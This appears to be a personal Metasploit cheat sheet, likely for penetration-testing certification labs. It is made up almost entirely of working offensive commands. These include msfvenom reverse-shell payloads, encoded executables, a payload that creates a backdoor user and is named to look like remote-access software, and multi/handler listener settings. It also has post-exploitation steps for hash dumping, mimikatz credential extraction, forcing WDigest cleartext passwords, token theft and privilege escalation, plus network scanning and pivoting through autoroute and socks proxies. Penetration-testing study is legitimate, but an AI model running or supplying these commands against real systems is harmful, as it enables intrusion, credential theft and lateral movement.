DB

//Initialize the DB (or re-initialize it)
msfdb init   (or: msfdb reinit)
db_status
//Create workspace in DB
workspace
workspace -a OSEP
//Scan network & add to DB
db_nmap -A 10.254.0.0/24
//OR import from an existing XML file
db_import /root/msfu/nmapScan
hosts
services -S 445

//Add all hosts running this service to RHOSTS
services -S 445 -R

Using the Database in Metasploit | Offensive Security

Payloads

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.27 LPORT=443 -f aspx -o clevergod_443.aspx
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=443 -f exe -o clg_443_e.exe -e x64/shikata_ga_nai -c 3
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=9001 -f exe -o clg_9001.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.49.75 LPORT=9001 -f exe > osc_msf_86.exe
set AUTORUNSCRIPT post/windows/manage/migrate
msfvenom -p windows/meterpreter/reverse_http LHOST=10.10.14.27 LPORT=9001 -f psh-cmd > 8081.cmd
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.49.75 LPORT=9001 -f war > tomcat.war

msfvenom -p windows/adduser USER=clevergod PASS=Hacker123$ -f exe > IperiusRemote.exe
use exploit/multi/handler
set LHOST 10.10.14.27
# msfvenom -l payloads
set payload windows/x64/meterpreter/reverse_https
set LPORT 443
# set exploit/multi/script/web_delivery

set payload windows/x64/meterpreter/reverse_tcp
set LPORT 9001
run -js

#set payload windows/meterpreter/reverse_tcp
#set payload windows/shell_reverse_tcp
set AUTORUNSCRIPT post/windows/manage/migrate

Post Exploitation

use post/multi/manage/shell_to_meterpreter
upload /home/kali/REVERSE/artifact.exe
execute artifact.exe

getuid
sysinfo

hostname && echo %username% && systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
migrate 7894

load incognito
getsystem
list_tokens -u

hashdump
run post/windows/gather/hashdump

shell reg add HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
shutdown -r -t 01

load kiwi
kiwi_cmd "sekurlsa::logonPasswords"
run post/windows/gather/bloodhound
run post/windows/gather/tcpnetstat
run post/windows/gather/enum_domain
run post/windows/gather/enum_domains
run post/windows/gather/enum_domain_group_users
run post/windows/gather/enum_logged_on_users

run post/windows/gather/arp_scanner RHOSTS=10.1.101.0/24

run post/windows/gather/checkvm
run post/windows/gather/credentials/credential_collector
run post/windows/manage/migrate
run post/windows/gather/enum_applications
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/hashdump
run post/windows/gather/usb_history

use post/multi/recon/local_exploit_suggester
tasklist /SVC
steal_token 5122

run post/windows/manage/multi_meterpreter_inject PAYLOAD=windows/shell_bind_tcp

DB_Nmap

#nmap
db_nmap -T4 -p- --open --min-rate=3000 -sS -sC -sV -vv 172.16.75.180,183,184,187,188,192,194,197

run post/windows/gather/arp_scanner RHOSTS=172.16.75.0/24

use auxiliary/scanner/portscan/tcp
set RHOSTS 172.16.75.0/24
set THREADS 50
//set PORTS 445
run

Port Scanning | Offensive Security


Pivoting

use post/multi/manage/autoroute
set session 8
set SUBNET 172.16.75.0
set NETMASK /24
run
route
route print

//Autoroute
run autoroute -s 10.129.158.0/24

//Manually adding routes
route add 172.16.75.0 255.255.255.0 3
ip route add 10.129.158.0/24 via 10.129.158.232

route flush

//portfwd add -l 3389 -p 3389 -r 172.16.194.141

Pivoting in Metasploit

Socks

use auxiliary/server/socks_proxy